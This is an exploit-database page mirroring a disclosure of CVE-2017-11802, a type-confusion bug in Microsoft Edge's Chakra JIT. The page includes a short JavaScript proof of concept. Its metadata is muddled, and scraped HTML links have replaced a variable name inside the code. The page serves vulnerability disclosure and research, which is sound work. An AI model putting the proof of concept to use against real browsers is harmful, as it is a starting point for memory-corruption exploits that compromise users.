Advertisement






Microsoft Edge Chakra JIT Failed RegexHelper::StringReplace Call

CVE Category Price Severity
CVE-2017-11802 CWE-125 $10,000 - $25,000 High
Author Risk Exploitation Type Date
CVE-2018-8161 High Remote 2017-10-15
CPE
cpe:cpe:/a:microsoft:edge
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017100111

Below is a copy:

Microsoft Edge Chakra JIT Failed RegexHelper::StringReplace Call
 Microsoft Edge: Chakra: JIT: RegexHelper::StringReplace must call the callback function with updating ImplicitCallFlags 

CVE-2017-11802


The "String.prototype.replace" method can be inlined in the JIT process. So in the method, all the calls which may break the JIT assumptions must be invoked with updating "ImplicitCallFlags". But "RegexHelper::StringReplace" calls the replace function without updating the flag. Therefore it fails to detect if a user function was called.


The PoC shows that it can result in type confusion.

PoC:
function main() {
    let arr = [1.1, 1.1, 1.1, 1.1, 1.1];
    function opt(f) {
        arr[0] = 1.1;
        arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
        arr[2] = 1.1;
        arr[3] = 1.1;
    }

    let <a href="https://crrev.com/0" title="" class="" rel="nofollow">r0</a> = () => '0';
    for (var i = 0; i < 0x1000; i++)
        opt(<a href="https://crrev.com/0" title="" class="" rel="nofollow">r0</a>);

    opt(() => {
        arr[0] = {};
        return '0';
    });

    print(arr[1]);
}

main();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum